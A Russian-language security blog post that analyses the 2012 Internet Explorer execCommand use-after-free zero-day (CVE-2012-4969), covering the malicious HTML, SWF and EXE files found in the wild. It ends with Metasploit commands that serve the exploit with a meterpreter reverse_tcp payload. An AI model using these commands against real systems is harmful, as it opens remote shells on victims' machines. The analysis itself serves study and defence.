Практика использования Metasploit — атака на Internet Explorer

Исследователь безопасности Eric Romang наткнулся на  уязвимость в Internet Explorer, которая используется для эксплуатации Java 0-day aka CVE-2012-4681. По сообщениям команды Metasploit, уязвимости подвержен Internet Explorer версии 7, 8 и 9. В операционных системах Windows XP, Vista и 7.

Утром 14 сентября, когда Eric Romang обнаружил на одном уязвимом сервере каталог “/public/help”, в котором лежало 4 файла: 111.exe, Moh2010.swf, Protected.html и exploit.html.

После того, как файлы были скачаны, Eric протестировал их на обновленной Windows XP Pro SP3 системе с обновленным Adobe Flash (11,4,402,265). Смотрите демонстрационное видео ниже:

exploit.html

Этот файл распознается, как html файл. VirusTotal не нашел в нем вирусов (https://www.virustotal.com/file/9d66323794d493a1deaab66e36d36a820d814ee4dd50d64cddf039c2a06463a5/analysis/1347710777/).

exploit.html” точка входа взлома. Этот файл создает массив из “IMG” файлов, а также загружает “Moh2010.swf” файл.

Moh2010.swf

Этот файл распознается, как файл Macromedia Flash Player. VirusTotal также не нашел вирусов в этом файле (https://www.virustotal.com/file/70f6a2c2976248221c251d9965ff2313bc0ed0aebb098513d76de6d8396a7125/analysis/1347710461/).

Вы можете заметить, что файл упакован DoSWF и распаковывается в памяти. После декомпрессии файла “Moh2010.swf” переполняется куча (heap overflow) и исполняется iframe в файле ”Protect.html”.

Встроенный ActionScript в оригинальный SWF-файл, тоже интересен. В нем вы можете увидеть специальные кодировки (Китайцы?).

Декодированный SWF-файл известен, как “Exploit:SWF/CVE-2010-2884.B”, или “SWF:Dropper” на VirusTotal (https://www.virustotal.com/file/dd41efa629c7f7f876362c5ca6d570be6b83728a2ce8ecbef65bdb89cb402b0f/analysis/1347785233/). Обнаружили его только 3/34 антивирусов. Благодаря binjo.

Этот файл в процессе эксплуатации проверяет, присутствует ли панель Website Storage Settings. Если панель есть, тогда файл “Protect.html” больше не загружается. Это означает, что пользователь больше не заражается при дальнейшем посещении сайта.

Отображается при первом посещении

 

Отображается при успешной эксплуатации

Отображается при последующих визитах

 

 

Protect.html

Этот файл распознается, как html файл. VirusTotal не нашел вирусов в файле (https://www.virustotal.com/file/2a2e2efffa382663ba10c492f407dda8a686a777858692d073712d1cc9c5f265/analysis/1347710701/).

Если посмотреть на исходный код, то можно увидеть интересный JavaScript код, который манипулирует IMG-массивом, созданным “exploit.html“ файлом.

Также видно, что идет проверка на выявление Windows XP 32-bit и Internet Explorer 7 или 8.

111.exe

Этот файл распознается, как Autodesk FLIC image файл и VirusTotal также не находит в нем вирусов (https://www.virustotal.com/file/a5a04f661781d48df3cbe81f56ea1daae6ba3301c914723b0bb6369a5d2505d9/analysis/1347710327/).

В Malware Tracker (https://www.malwaretracker.com/docsearch.php?hash=baabd0b871095138269cf2c53b517927) файл распознается, как подозрительный и требует дальнейших исследований.

[ad name=»Responbl»]

После декодирования, файл 111.exe все равно не определяется антивирусами на VirusTotal (https://www.virustotal.com/file/a6086c16136ea752fc49bc987b8cc9e494384f372ddfdca85c2a5b7d43daa812/analysis/). Но при анализе файла в Malwr analysis (http://malwr.com/analysis/7173d9b331275b8be69a4e698c9ec68f/), файл распознается, как программа для автоматического запуска при входе в систему.

Заключение

После того, как Eric Romang обнаружил 0-day уязвимость, файлы с сервера были удалены через 2 дня.

Команда Metasploit, совместно с Mr. Romang и @binjo создали работающий эксплоит. Скачать который вы можете здесь, а также применить последние обновление, чтобы забрать (to pick up) эксплоит.

Microsoft Internet Explorer execCommand Vulnerability Metasploit Demo

Уязвимость была обнаружена Эриком Романгом (Eric Romang)
Первые сведения об уязвимости 2012-09-14
Подробные сведения уязвимости binjo 2012-09-16
Metasploit PoC 2012-09-17

PoC:

unknown
eromang
binjo
sinn3r
juan vazquez

Упоминания:

OSVDB-85532
Vulnhunt.com
eromang blog
Metasploit
CVE-2012-4969
MSA-2757760
MS12-063

Затронутые версии ОС:

E 7 on Windows XP SP3
IE 8 on Windows XP SP3
IE 7 on Windows Vista
IE 8 on Windows Vista
IE 8 on Windows 7
IE 9 on Windows 7

Тестировалось на Windows XP Pro SP3:

Internet Explorer 8

Описание:

Этот модуль использует уязвимость обнаруженную в Microsoft Internet Explorer (MSIE). При рендеринге HTML-страницы, объект CMshtmlEd будет неожиданным образом удален, но та же память будет повторно использовать в функции CMshtmlEd::Exec(). Обратите внимание, что уязвимость была найдена спонтанно “в дикой природе” (in the wild) 2012-09-14. В настоящее время для нее нет официальныз патчей.

Команды:

use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.178.33
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid

Click to rate this post!
[Total: 2 Average: 3.5]

Специалист в области кибер-безопасности. Работал в ведущих компаниях занимающихся защитой и аналитикой компьютерных угроз. Цель данного блога - простым языком рассказать о сложных моментах защиты IT инфраструктур и сетей.

Leave a reply:

Your email address will not be published.